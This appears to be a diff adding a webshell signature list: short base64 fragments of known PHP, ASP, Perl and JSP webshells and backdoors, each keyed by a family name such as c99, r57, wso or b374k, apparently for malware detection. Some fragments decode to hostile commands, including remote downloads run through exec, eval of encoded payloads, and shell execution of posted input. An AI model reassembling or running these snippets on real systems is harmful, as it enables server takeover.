+s:64:"F4NE1qRk9YSGd6WVZ4NE1HUmNlREUxWEhnd1lseDRNV1ZjZURBMk5EWmNlREl3WE";
+s:22:"joomla_spam[2][1][php]";
+s:64:"aW4gY29uZmlnLiogZmlsZXMuLi5cblxuIjsgDQpmb3JlYWNoICgkdXNlcnMgYXMg";
+s:14:"O0O[0][0][php]";
+s:64:"mV3IFNoZWxsIEJ5IC4vTUN5YmVyTGlua19Qb3J0MjIpICovIA0KJGF1dGhfcGFzc";
+s:20:"phpshell[35][0][php]";
+s:64:"CgkZGlyLiIvIi4kZGlzbWkyLCRmaWxlcGVybSkgPyAiPGZvbnQgY29sb3I9JyMwM";
+s:17:"aZRaiL[0][0][php]";
+s:64:"WC1vIDYtbyBYLW8gTy1vIEwtbyBlLW8geC1vIFItbyA0LW8gKy1vIDYtbyBULW8g";
+s:15:"c99[16][0][php]";
+s:64:"3R3ZzamhWb0NXdVUzamNmNXhISWVWR2ZhNDlaVTFUUlRNMzVuVWxEaWZ1eEZjSjR";
+s:20:"stunshell[2][0][php]";
+s:64:"KICAkRENDeyRkY2Nzb2NrfXtieXRlc30gPSAkYnl0ZXM7CiAgJERDQ3skZGNjc29";
+s:17:"perlbot[0][1][pl]";
+s:64:"zIiwiQWxhdmkiLCJBbGNvcm4iLCJBbGRhIiwNCiJBbGVrcyIsIkFsbGlzb24iLCJ";
+s:18:"harauku[0][0][php]";
+s:64:"EtabDFKbGcNCjVGM1VDamxPZUdoWHpkd1lTTTluUHpnZlpjREpVY2ZQWGk1YkFMM";
+s:17:"b374k[11][0][php]";
+s:64:"dHRZUmFCV2lMTFVySHlxZHN5MGE5UHRnL2YwTHJxNnZwUWY0OGw3ODI3YXNQeVdS";
+s:14:"c99[1][0][php]";
+s:64:"EtaSB1LWkgeC1pIFAtaSA0LWkgMi1pIFQtaSBKLWkgTi1pIGQtaSB3LWkgMS1pIH";
+s:19:"phpshell[1][0][php]";
+s:64:"IGJyZWFrOwp9CmlmICghJGxlbikgewoJIyBXZSBmYWlsZWQgb24gdGhlIG1haW4g";
+s:21:"metasploit[0][0][php]";
+s:64:"D0gbXlzcWxfbGlzdF9kYnMoJHNxbF9zb2NrKTsNCiAgIGlmICghJHJlc3VsdCkge";
+s:15:"c100[0][0][php]";
+s:64:"NobyAiRmFpbCI7CgkJCXJldHVybjsKCQl9CgkJJGNvbCA9IG15c3FsX251bV9maW";
+s:19:"webmysql[0][0][php]";
+s:64:"ZGVzIHZlbmFudCBkZSBQSFAiOwp9CgppZigkb3B0aW9uID09IDIpewogICAgcHJp";
+s:19:"backdoor[2][0][php]";
+s:64:"bkpiZDkrNHFzVjZaWkZQV1RRYUJsY2k1S2NHaDE3WU5QTmxVOCIsIjVWRUQzWktE";
+s:19:"phpshell[8][0][php]";
+s:64:"PD9waHANCmlmKCRfUE9TVFsicGFzcyJdID09ICIyNjNjZDdhZTUwNzhhODQxZTAx";
+s:14:"cmd[8][0][php]";
+s:64:"RXRzTGt2Y1dGWWtuL1lRb29aMTdGaDBIRGVNWFBjRUJUWTg3b082WGVJSGt1Qnlj";
+s:15:"wso[19][0][php]";
+s:64:"c3QgPSAnIiInOwogIH0gZWxzZSB7CiAgICAkZXNjYXBlZCA9IGFycmF5X21hcCgn";
+s:19:"simshell[0][0][php]";
+s:64:"GVybXM9JHR5cGVbMF07CiAkcGVybXMuPSgkbW9kZSAmIDAwNDAwKSA/ICJyIiA6I";
+s:14:"gfs[0][0][php]";
+s:64:"7CiAgICAgICAgfQogICAgfQp9Cj8+Cjxicj4KPHRleHRhcmVhIG5hbWU9InNoZWx";
+s:18:"myshell[0][0][php]";
+s:64:"QpGb2xkZXJBdHRyaWJ1dGVzID0gIlN5c3RlbSwgRGlyZWN0b3J5IgpjYXNlIDIyI";
+s:18:"ntdaddy[0][0][asp]";
+s:64:"7DQogIGVjaG8gIkZsdXNoXG4iOw0KICBlY2hvICI8dWw+XG4iOw0KICBlY2hvICI";
+s:16:"mysql[7][0][php]";
+s:64:"1RVME5ETXpOVEl5WkRabE9EYzNNekEwT1dOaVkxc2laWGhsWTNWMFpTSmRJRDBnS";
+s:18:"tdshell[1][0][php]";
+s:64:"Q1gwV1ZFVHV6TDN5VE15cVFHYVdESFNaZUZQOWRGR002b3d5MXJhYzNBM2NSSlFN";
+s:19:"filesman[1][0][php]";
+s:64:"dOSEZRMDkvWUdBdGJ1cXZ4dHpUcXp4OUxJMVk4N0kyUFRzS250UEtVVVFjQlptSG";
+s:14:"c99[2][0][php]";
+s:64:"kVULj1mZ2V0cygkZiwgNDA5NiApOwoJZmNsb3NlKCAkZiApOwoKCXByaW50ICJcb";
+s:18:"dxshell[1][0][php]";
+s:64:"Dq8Otw6XDrcOow6Ugw6/DsMOuw6jDp8Oiw67Dq8O8w63DrsOjw64gUEhQLcOqw67";
+s:14:"c99[8][0][php]";
+s:64:"dmFsdWU9Ii9ldGMvc3lzbG9nLmNvbmYiPlN5c2xvZyBBeWFybGFyaTwvb3B0aW9u";
+s:19:"spyshell[1][0][php]";
+s:64:"JcIj4iLiR2YWx1ZS4iLzwvQT4gICAgICAgICAgICAgICAgICAiLmRhdGUoInIiLG";
+s:19:"backdoor[1][0][php]";
+s:64:"iBvdGhlciBmcmVlIG9yIG9wZW4gc291cmNlIHNvZnR3YXJlIGxpY2Vuc2VzLgogK";
+s:15:"c99[27][0][php]";
+s:64:"PD9waHANCmVjaG8gIjxoMz5Xb3JrcyEgVXNhZ2U6IGcwMG4ucGhwP2cwMG49W0NN";
+s:15:"cmd[30][0][php]";
+s:64:"V0ZXInLAoncmVzZXQnID0+ICdSw6lpbml0aWFsaXNlcicsCidyZWxhdGl2ZScgPT";
+s:17:"hacker[0][0][php]";
+s:64:"GVybXMNCiAgQ2FsbCBvUy5SdW4oIndpbi5jb20gY21kLmV4ZSAvYyBjYWNscy5le";
+s:15:"cmd[15][0][asp]";
+s:64:"2hlciBsZXZlbHMgPC9kaXY+IAogICAgPC9mb3JtPiAKICAgIDwvdGQ+IAogIDx0Z";
+s:16:"c2007[0][0][php]";
+s:64:"d04ydHZWRWhLYm1oaVNIbFJhV1JWYlhwa2JHd3pWRzV4WjNadlRYaDJOV3N4Tms5";
+s:14:"wso[7][0][php]";
+s:64:"RTV6eHVzYTMvK3RqNTJaR1ZjaG45Tldqc0lyT3c5Ky9ydWYyRnhrMVlkemhiNzBh";
+s:20:"filesman[23][0][php]";
+s:64:"CYufy8yS3hrK1JTRGJPKyxKRVsxXFcnckpAI0AmLitrd1cJZG5SU0RiWW5QRUVMW";
+s:18:"indexer[0][0][asp]";
+s:64:"yTzh1MlY4b2hKWUMrYkZxSmtoeVc4bjJKSkNUYTdHN1oxYnowdmVLUE52dkJGdWV";
+s:18:"webroot[1][0][php]";
+s:64:"I8L29wdGlvbj5cclxuIjsNCiAgICB9DQogIH0NCiAgZWNobyAiPC9zZWxlY3Q+XH";
+s:22:"FaTaLisTiCz[0][0][php]";
+s:64:"AvZ3JlcC50eHQnLAonbG9jYXRlIGNvbmZpZy5waHAgZmlsZXMgPj4gL3RtcC9ncm";
+s:15:"r57[14][0][php]";
+s:64:"HpjMGRlCgokamFtZXMwYmFzdGVyID0gIjdYMTdlOXE0OHZEZjNlZlo3NkI2Y3hiW";
+s:16:"b374k[5][0][php]";
+s:64:"kb044andRQWRFVlcKVlkxckVQOVVqd1JkWG90ZERBdkFkRE40UEl0N0NGUG9xZjc";
+s:14:"fx0[3][0][php]";
+s:95:"bb:JF9fX19fKyspeyRfX19fWyRfX19fX109Y2hyKCggb3JkKCRfX19fWyRfX19fX10pLW9yZCgkX19fWyRfX19fX10pKQ==";
+s:14:"pas[0][0][php]";
+s:64:"XSk7DQogICAgICAgIGVjaG8gIjwvdGV4dGFyZWE+IjsgICAgZGllKCk7DQogICAg";
+s:19:"gscshell[0][0][php]";
+s:64:"sICR1cGxvYWRmaWxlKSkgewogICAgZWNobyAi1ODp6+4g8/Hv5fjt7iDn4OPw8+b";
+s:21:"kadotshell[0][0][php]";
+s:64:"gICAgPHRkIHdpZHRoPSIyMTkiPg0KICAgICAgICA8Zm9udCBzaXplPSItMyIgZmF";
+s:15:"spam[3][0][php]";
+s:64:"IwTWpqcTBTdHJlcGZQWUozcW90dnkza3RLa083N2hWOXg2TC81UnU1a0lVRWJ2OD";
+s:15:"c99[13][0][php]";
+s:64:"eFM5K3h1dDIwUkVEYWZrQmFNaUR0SUNEdE1DRHR5S1BJdmw1RTZPeVdYM0RGZnZK";
+s:15:"c99[17][0][php]";
+s:64:"GFsbG93LGRlbnkKICAgIEFsbG93IGZyb20gYWxsCjwvRmlsZXM+CgojIE1ha2UgL";
+s:30:"htaccess_shell[0][0][htaccess]";
+s:64:"gPz8/Pz8/Pz8/PyBzaGVsbC0/Pz8/Pz8gKD8/Pz8/ID8/Pz8/Pz8sID8/Pz8/ID8";
+s:15:"c99[25][0][php]";
+s:64:"IHZhbHVlPSJFbnRlciI+CjwvdGQ+PC90cj4KJHRlbmQKSFRNTDsKCmlmIChpc3Nl";
+s:19:"kaushell[0][0][php]";
+s:64:"G9EMDBOTnJWT2ZOdFkreHF5N04zQWdmSVdia0s2ekkvY1lQZ3J1VnpXeksxNFJoO";
+s:20:"darkshell[1][0][php]";
+s:64:"gPHRkIHdpZHRoPSI1MCUiIGhlaWdodD0iMSIgdmFsaWduPSJ0b3AiIGJnY29sb3I";
+s:23:"stressbypass[1][0][php]";
+s:64:"yIFNlcnZlciBpbnRydXNpb248L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE1IiA";
+s:18:"madspot[0][0][php]";
+s:64:"TTZpUkgzVUVQdDZzZC9ZcWFYYjhvbTAzeGJ1cUZNaW9QY3lVdktQNnZTUnpjcW1p";
+s:19:"filesman[0][0][php]";
+s:64:"NlIGYuYXR0cmlidXRlcw0KY2FzZSAwDQpGb2xkZXJBdHRyaWJ1dGVzID0gIk5vcm";
+s:22:"elmaliseker[0][0][vbs]";
+s:64:"hZDd4cS80NytiZ0lxT1MxdmZpcWd4amtzMEFENklIY2hkM3pVWDc5dnFwVFdlUzZ";
+s:15:"c99[20][0][php]";
+s:64:"Sis4a216YkxlbmZBenBHcTZlVitqdkdqdk84T0JNUnlaUTNyc3BtdCs1Ty9ZazBa";
+s:15:"r57[18][0][php]";
+s:64:"YWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwv";
+s:16:"telnet[1][0][pl]";
+s:64:"PScwNCc7IGJyZWFrOw0KCQkJCWNhc2UgJzUnOiAgJGRhdGU9JzA1JzsgYnJlYWs7";
+s:20:"foreverpp[0][1][php]";
+s:64:"aXplIl08JF9QT1NUWyJNQVhfRklMRV9TSVpFIl0pCiAgICB7CiAgICAgIGlmKG1v";
+s:22:"phpbackdoor[1][0][php]";
+s:64:"ZWxsPC90aXRsZT48bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRl";
+s:25:"antichat_shell[1][0][php]";
+s:64:"ZQ0KCQkJCVJlc3BvbnNlLldyaXRlICI8Zm9udCBmYWNlPSIiYXJpYWwiIiBzaXpl";
+s:21:"smartshell[0][0][asp]";
+s:64:"VkJyA9PiAiRGlzc2UgZmlsZXIgZXIga29waWVyZXQgdGlsIFwiWyUyXVwiOlxuWy";
+s:19:"webadmin[2][2][php]";
+s:64:"MGc1citqUWR6VGxrMndYaVcwd0h1aFBNeTJBR0NpTWsvek5CTDZrNXFWS0swSm5U";
+s:17:"b374k[17][0][php]";
+s:64:"PD9waHAKLypjODY0OWE5YTE2NTNmODUyODQzZjQ0ZjkxNmJjYjQ0ZCovaWYoaXNz";
+s:15:"cmd[14][0][php]";
+s:64:"FU3NVQ3QjJyRTI2OUd4cHBFdjZ3RG95YSsxdE5CdVVWUDRHV0FVL3ZveU14MVgxW";
+s:20:"phpshell[26][0][php]";
+s:64:"pIHsNCiAgICAgICAgcHJpbnQgIkZpbGU6Ii4gIGJhc2VuYW1lKCAkX0ZJTEVTWyd";
+s:20:"ironshell[1][0][php]";
+s:64:"NNWWpSN0lUZTQ0ZGtVc29IbnhEWWM4ZHlxcmJ2ZGJtaitqY285eWNWMmtrUkpHRk";
+s:22:"bogel_shell[1][0][php]";
+s:64:"iKSB7DQoJCQkkcmVzdWx0PXNoZWxsX2V4ZWMoJF9QT1NUWydjb21tYW5kJ10pOw0";
+s:15:"erne[2][0][php]";
+s:64:"IApOYW1lOjwvZm9udD48L2Rpdj4gCjwvdGQ+IAo8dGQgd2lkdGg9IjMxNyIgYm9y";
+s:24:"moroccan_spam[0][1][php]";
+s:64:"vZm9ybT48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPGJyPjxkaXYgY2xhc3M9YmFyaGV";
+s:23:"antisecshell[1][0][php]";
+s:64:"OQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa2NHdG1ORFZ";
+s:19:"cmos_clr[0][0][php]";
+s:64:"IDwvZm9udD4NCiAgICAgICAgICAgICAgPD9waHAgDQovLyBDaGVjayBmb3IgU2Fm";
+s:19:"s72shell[1][0][php]";
+s:64:"pOwogICAgJHVkID0gdXJsZW5jb2RlKCRkaXIpOwogICAgJHV2ID0gdXJsZW5jb2R";
+s:15:"c100[1][0][php]";
+s:64:"cmsgPSBTZXJ2ZXIuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0Lk5ldHdvcmsiKQoJCVNl";
+s:17:"rhtool[0][0][asp]";
+s:64:"8L3RkPicpOwoJCQkJCQlwKCc8dGQ+Jy4kcm93WydTZXFfaW5faW5kZXgnXS4nPC9";
+s:17:"phpspy[3][0][php]";
+s:64:"CBmb3JlYWNoICgkYWxsTGlua3MgYXMgJGtrID0+ICR2dil7ICRhbGxEbW5zW10gP";
+s:27:"brute_force_tool[0][0][php]";
+s:64:"fKC0oLChdKDorfCg6LV8oLCg6KDooXShdLCYoXyhfKGAtXigsKDooLihdKF0oXig";
+s:20:"phpshell[31][0][php]";
+s:64:"DBnaEJIRG5aK2lJREtGekdSeVRjZE5BWEd1ME05ekZuU0U3cWJFWUZneDdnR2owN";
+s:15:"c99[22][0][php]";
+s:64:"hc3MpKSB7CiAgICBpZihpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgKG1kNSgkX1B";
+s:14:"wso[4][0][php]";
+s:64:"LMmJobTEzQkNLdkJFZnptNUs1T0x2Y3pjQlFrTm5iT2pyZjlVcDY5VUJ3T094MC9";
+s:15:"r57[10][0][php]";
+s:64:"TMW8KNjNtMW4vc2FzZ25kWHpWTDRZRUFzUFVXZTZrZ3VpYVMxSGFIZFZDdAozaCs";
+s:19:"sec4ever[0][0][php]";
+s:64:"0Rmhzb0hsa3JsYUYwZ0V6K0dkaENFdENhQWlZaWNqU0tZV3NnV0tzUHVUTG9LTVR";
+s:25:"shell_uploader[6][0][php]";
+s:64:"VU8vNEtLazUvK3VJT1Nkc3hlOWJicGI5MFBPRmpCWm1nYnFsdmVOTk92a2wyVmlF";
+s:14:"wso[6][0][php]";
+s:64:"cyBhIGNvbnNlcXVlbmNlIG9mIHVzaW5nIHBlZXItdG8tcGVlciB0cmFuc21pc3Np";
+s:19:"filesman[2][0][php]";
+s:64:"0KaWYoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZmlsZSddKSl7ZmlsZV9wdXRfY29udG";
+s:17:"jackal[3][0][php]";
+s:64:"Mj4mbmJzcDsiLiR2YWx1ZXMuIiZuYnNwOzwvZm9udD48L3RkPjwvdHI+IjsNCiAg";
+s:14:"r57[7][0][php]";
+s:64:"c4Y0JGL3kiLCJmUW5FeFZCOCtENVdENXo4Um8iLCJ2Vjc4ODlkZmdRalFqaWhCLz";
+s:20:"phpshell[14][0][php]";
+s:64:"NzQ0LDMwLDM4NzEsMjYsMzI4Myw1MywyNDg1LDU0LDk1NDksNTUsODQ4Myw1OSwy";
+s:19:"webshell[1][0][php]";
+s:64:"AogYXJyYXkoIjxiPltTUUxdPC9iPiIsJHN1cmwuImFjdD1zcWwmZD0lZCIpLAogY";
+s:20:"phpshell[17][0][php]";
+s:64:"ICRsaW5lKQ0KICAgew0KICAgIGlmICghZW1wdHkoJGxpbmUpKQ0Kew0KZWNobyAi";
+s:15:"c99[10][0][php]";
+s:64:"5Q2dvZ2FXWW9KRjlRVDFOVVd5ZG1iM0p0WDJGamRHbHZiaWRkSUQwOUlERWdLUW9";
+s:18:"mrtiger[0][0][php]";
+s:64:"UtkdmpXVDU2R24rV2JJVkV6UUpsJywnb3Y5dk5iU2Z5ME15ZnFVVXQ2dHBGSycsJ";
+s:15:"empo[0][0][php]";
+s:64:"VhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOWtaU0pkS1NrN0NuMD0nOyAKI";
+s:15:"cmd[25][0][php]";
+s:64:"LVWtySjlCbXB2cEozbWgvMm54OEZsMGY1YlRGOHgveXcwcEtXUlJDbytmZlVRdGV";
+s:15:"c99[14][0][php]";
+s:64:"pOUjBoNDRMdDI0TDFvYWwwcWIvZDQ0cVNocWw0M05PVW5uMnQyUXdEZkVrZHFxUj";
+s:20:"filesman[26][0][php]";
+s:64:"9BRi9Ed3ZZajQ2QWo4b0RJSUNORVBsTmNFUWtLR0FGZU55WlpoZEY3QnpaUlh3Yj";
+s:14:"wso[2][0][php]";
+s:64:"iIpKSB7IA0KICAgICAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgDQogICAgI";
+s:20:"configspy[0][0][php]";
+s:64:"2V4ZWN1dGlvbl9tZXRob2QoKQp7CiAgICBpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc";
+s:20:"ironshell[3][0][php]";
+s:64:"seDRNV1Y2WWx4NE1UVmNlREExWEhnd1lWeDRNV1JjZURRd1ZWeDRNVFkzVVZoY2V";
+s:22:"joomla_spam[0][1][php]";
+s:64:"PD9waHAKLyplYzAxOTJiM2FlNjkyNDEwODlmNGI2YmQ1ZDY4NDg0NCovaWYoaXNz";
+s:15:"cmd[11][0][php]";
+s:64:"CcsICR0aGVzZT0nJykgLyogRXF1YWwgdG8gRHhVUkwoKSwgYnV0IHByaW50cyBvd";
+s:18:"dxshell[0][0][php]";
+s:64:"VFUMU5VV3lkd01pZGRMQ0FrZEdWdGNDa3BldzBLQ1FrSkNXVmphRzhnUUdacGJHV";
+s:19:"v0ld3m0r[1][0][php]";
+s:64:"ZWQgXCIkZmlsZVwiPGJyPiI7DQogICAgICAgICB9DQogICAgICAgIGVjaG8gIjxm";
+s:19:"safemode[5][0][php]";
+s:64:"ZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKSB7DQogICAgICBAb2Jfc3RhcnQo";
+s:22:"FaTaLisTiCz[3][0][php]";
+s:64:"SicsJ1JjQW4xS0hiRmVzOGFkeXVIOScsJ0hoVi81YkJFZFZHNTBzV3NlaycsJzM1";
+s:17:"noname[0][0][php]";
+s:64:"FuPSIzIj4mbmJzcDs8JT1lbnYucXVlcnlIYXNodGFibGUoIm9zLm5hbWUiKSU+ID";
+s:23:"jspwebshell[1][0][java]";
+s:64:"H0NCi5saXN0aW5nIHRoLnBlcm1pc3Npb24geyB0ZXh0LWFsaWduOiBsZWZ0IH0NC";
+s:19:"webadmin[5][2][php]";
+s:64:"qOG5TS0hXNzdqSUVOckRSZmtFOU9rZWFlUThwVVRJdFB3bEVOUHFoSXBVamw2T1l";
+s:14:"wso[8][0][php]";
+s:64:"1wOyBVc2VycyA8L3A+DQo8cCBjbGFzcz0ic3R5bGUxIj5CeXBhc3M8L3A+DQo8cC";
+s:17:"us3rspl[0][0][pl]";
+s:152:"+IGluZGV4LnBocCcpOw0KQGV4ZWMoJ2ZldGNoIC1vIGluZGV4LnBocCBodHRwOi8vaGJiYi5jb20uYXUvLi4uL2luLnR4dCcpOw0KQGV4ZWMoJ0dFVCBodHRwOi8vaGJiYi5jb20uYXUvLi4uL2luLnR";
+s:25:"shell_uploader[0][0][php]";
+s:64:"Glvbj0iP3k9PD9waHAgZWNobyAkcHdkOyA/PiZhbXA7eD11cGxvYWQiIGVuY3R5c";
+s:20:"m1n1shell[0][0][php]";
+s:64:"LVUJsZUdWaktDUmpiV1FwT3dvSlpXeHpaV2xtS0daMWJtTjBhVzl1WDJWNGFYTjB";
+s:26:"shell_uploader[14][0][php]";
+s:64:"zSGl1S1hNM1lia0U1b3lhcGRudElZOStqbkVBTnZHbzFpbmxDTXpkZis2c3BpUU5";
+s:20:"phpshell[20][0][php]";
+s:64:"z8/Pz8nLAoncnVfdGV4dDYnID0+Jz8/Pz8/Pz8/PyA/Pz8/JywKJ3J1X3RleHQ3J";
+s:14:"r57[5][0][php]";
+s:64:"ZiBuYW1lPSJ4cCI+DQoNCg0KPD9waHANCg0KDQogICAgICBpZiAoJF9HRVRbJ3Vz";
+s:17:"cpanel[0][0][php]";
+s:64:"IgdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygkZmlsZSkuJyI+PGlucHV0IHR5cG";
+s:17:"cpanel[1][0][php]";
+s:64:"mhsaW5LKCJzZUM9aGV4JmZpbEU9JGZuJndvcmtpbmdkaVI9JGN3ZCIpLiJcIj5IZ";
+s:17:"jackal[2][0][php]";
+s:64:"NmJjYWI0NTMyZWI4NTRlIA0KJGNvbG9yID0gIiMwMEZGNjYiOwkvL0NvbG91cg0K";
+s:20:"filesman[11][0][php]";
+s:64:"6IEZBTFNFOyB9DQpmdW5jdGlvbiBnZXRkaXNmdW5jKCkgeyAkcmV6ID0gZXhwbG9";
+s:19:"ipays777[0][0][php]";
+s:64:"HdkWjRFL1lveFUwcm9QUFhjR0RGc3FEaGJiUWpSZVFiSW5sK0RzanJGZVAyMStqV";
+s:20:"phpshell[24][0][php]";
+s:64:"zIHdpdGggdXNlcjog3sfG4+Ugx+Hj5sfe2iDj2iDH0+Mg7ebS0cfK5cc8L2ZvbnQ";
+s:18:"symlink[0][0][php]";
+s:64:"lxuIjsNCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KDQoJZWNobyAiPC90YWJsZT4iO";
+s:16:"mysql[9][0][php]";
+s:64:"h0WFgyclFuZlBXcVZaMGVzSGltRHIyZGttKzV3YmpuajJqUnpvRmJaUnlMakVsQ2";
+s:20:"phpshell[25][0][php]";
+s:64:"TXBPdz09IjsgDQpldmFsKGJhc2U2NF9kZWNvZGUoJGluamJ1ZmYpKTsNCi8qIGN5";
+s:15:"wso[18][0][php]";
+s:64:"NGRkZGRkYiIG9uQ2xpY2s9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd0Y29sb3";
+s:20:"constance[0][0][php]";
+s:64:"7e46PGJyPjx0ZXh0YXJlYSByb3dzPTggY29scz04MD4iLmJhc2U2NF9lbmNvZGUo";
+s:19:"nixshell[0][0][php]";
+s:64:"IG91dHNldDsKQk9SREVSLUxFRlQ6ICAgIzk3QzI5NiAxcHggb3V0c2V0OwpCT1JE";
+s:14:"r57[1][0][php]";
+s:64:"jQCZ+LFBQNkdELGsnOH5PVyw6bTZAI0Amfn4sUH5QLH54bTpueEs0TGkyXldDTmN";
+s:16:"efso2[0][0][asp]";
+s:64:"1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddID0gc3RyX3JlcGxhY2UoICdcXCcsICcvJ";
+s:25:"phpfilemanager[5][0][php]";
+s:64:"V1k0ZlR1Qk9Sc29ab08yTzBYdWUrQVB3TkZXZXRCTU5WTW5DK0dsRGlhR0FkZWFL";
+s:20:"al-marhum[1][0][php]";
+s:64:"2alFGdTk3a1Y0STRabk1tTWtxQjdCemR3Vm9DblNZVGdETThZN0NmVHliUVNlM0d";
+s:20:"filesman[18][0][php]";
+s:64:"XJyb3IoIk5vIGNvbmZpZ3VyYXRpb24gZmlsZXMgZm91bmQhIik7CiAgICB9IGVsc";
+s:17:"teamps[0][0][php]";
+s:64:"wA/AD8APwAgAD8APwA/AD8APwA/AD8APwA/AD8APwAgACcAIwAnACkAIgAsAAANC";
+s:21:"remoteview[2][0][php]";
+s:64:"1ZT0zMj5BcmNoaXZlIikKcmVzcG9uc2Uud3JpdGUoIjxicj48aW5wdXQgdHlwZT1";
+s:22:"elmaliseker[1][0][vbs]";
+s:64:"25sb2FkXCI+PC9mb3JtPjwvZGl2PiI7CgoKCmVjaG8gIjxkaXY+PEZPUk0gbWV0a";
+s:19:"webshell[2][0][php]";
+s:64:"cE95QmxZMmh2SUNjOEwzUmxlSFJoY21WaFBpYzdmUTBLWldOb2J5QW5QR1p2Y20w";
+s:23:"simple_shell[0][0][php]";
+s:64:"npsaWI6Ly8iLiRmaWxlLCAkdGVtcCkpewokenJvZGxvID0gZm9wZW4oJHRlbXAsI";
+s:19:"safemode[0][0][php]";
+s:64:"BjbTVOTTFBdlJrSldhSEpRDQpUemxzTmtsMGIzbDBNSGxvWjJzcldIa3ZWMGR3Tk";
+s:17:"sempak[0][0][php]";
+s:64:"NEaFpBclJpSjMvK09SRWY0K21QajQxWEViNkUxTjVvT3ZmcFoxajFtU241bHp2Vl";
+s:25:"shell_uploader[2][0][php]";
+s:64:"CiAgICAlPiA8L2ZvbnQ+PC9kaXY+CiAgICAgIDwvdGQ+CiAgICA8L3RyPgogICAg";
+s:26:"powerdreamshell[0][0][asp]";
+s:64:"IlVuYXNzaWduZWQiOwoKJHBvcnRbNjFdID0gIk5JIE1BSUwiOwoKJHBvcnRbNjJd";
+s:29:"networkfilemanager[0][0][php]";
+s:64:"qcUpYRVJ3V1JzaTJ5c3VMV0ExdFhxbXdNMmxGaERVOWdrcWlhRHNubEo3dExGYjJ";
+s:15:"r57[12][0][php]";
+s:194:"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZm";
+s:15:"cmd[13][0][php]";
+s:64:"uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQ0KCQk";
+s:19:"cgitelnet[0][0][pl]";
+s:64:"Wx0Yi9ldnZubXFuNHQvOURFNHAwdmRYL3Z0a012MS9wViBlICIuIngiLiIrIi4ie";
+s:19:"filesman[6][0][php]";
+s:64:"QxMDcnPT4nx+Hj5tbm2icsDQonZW5nX2J1dHQxNSc9PifF0dPH4ScsDQonZW5nX3";
+s:22:"snipershell[2][0][php]";
+s:64:"kY7CiAgYmFja2dyb3VuZDogI0YwMDsKfQoKLmVudHJpZXMgewogIGJvcmRlcjogM";
+s:20:"gammashell[0][0][pl]";
+s:64:"Hh0Jyk7DQpleGVjKCdjZCAvdG1wO0dFVCBodHRwOi8vbGV0dG9yZS5wbC9maWxlL";
+s:25:"shell_uploader[7][0][php]";
+s:64:"lhYmxlIE5hbWU8L0I+PC9mb250PjwvcD4KICAgICAgPC9URD4KICAgIDxURCB3aW";
+s:20:"variables[0][0][asp]";
+s:64:"GxvYWRlZF9maWxlKCRfRklMRVNbJ3Byb2JlJ11bJ3RtcF9uYW1lJ10sICIuL2Rpb";
+s:19:"nccshell[0][0][php]";
+s:64:"ktMTsKICAgJGV4dCA9ICRleHRbJGNdOwogICAkZXh0ID0gc3RydG9sb3dlcigkZX";
+s:19:"phpshell[6][0][php]";
+s:64:"TGhWT2pGIiwiZE9jZlFpY2NIY0Y5MTZvOXNIOGdKbngxTmNSZWNxVzJvcXMvUXlH";
+s:25:"shell_uploader[3][0][php]";
+s:64:"0VSVkVSWydIVFRQX0hPU1QnXS4iL1wiPmh0dHA6Ly8iLkAkX1NFUlZFUlsnSFRUU";
+s:20:"phpshell[28][0][php]";
+s:64:"Ym90dG9tbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIw";
+s:17:"sincap[0][0][php]";
+s:64:"ICAgICAgdHJ5OgogICAgICAgICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0";
+s:20:"cgi-python[0][0][py]";
+s:64:"HOGlhU3p0aHJXemhUSnU4c2k1SWk3ODUrdnZrSllMb2V1OGJydktoZzFiZVFNVTN";
+s:14:"cmd[6][0][php]";
+s:64:"ZUUHoyQXRKVHBkTVFTU1NlRzh6QzVyaGhQd09td3E1aytoVHRpWWFQVExBSXdXS2";
+s:20:"configspy[4][0][php]";
+s:64:"ZyBzID0gc3RtcmRyLlJlYWRUb0VuZCgpOw0Kc3RtcmRyLkNsb3NlKCk7DQpyZXR1";
+s:16:"cmd[17][0][aspx]";
+s:64:"2V7IHVuc2V0KCRvWHlhcW1Ib0NodkhRRkN2VGx1cW1BQ1snaW5mbyddWydmYWlsJ";
+s:28:"wordpress_exploit[0][0][php]";
+s:64:"NzYWdlKTsKfQprcklSKEFYU2JiLlZhbHVlKTsKfQpwdWJsaWMgdm9pZCBnTEtjKH";
+s:20:"qReyFuRt[0][0][aspx]";
+s:64:"CI8Zm9udCBzaXplPScxJyBjb2xvcj0nIzk5OTk5OSc+RG9udCBpbiB3aW5kb3dzI";
+s:22:"simattacker[0][0][php]";
+s:64:"W9temZ2SmpxVlZFZ3R1Z21EeUEwYm1CWDFwUVNBOUlEanE4b0hteVp3TTlnc2JnV";
+s:15:"c99[28][0][php]";
+s:64:"YWJsZXMoICRkYm5hbWUgKTsNCg0KCWlmKCAkcFRhYmxlID09IDAgKSB7DQoJCSRt";
+s:16:"mysql[8][0][php]";
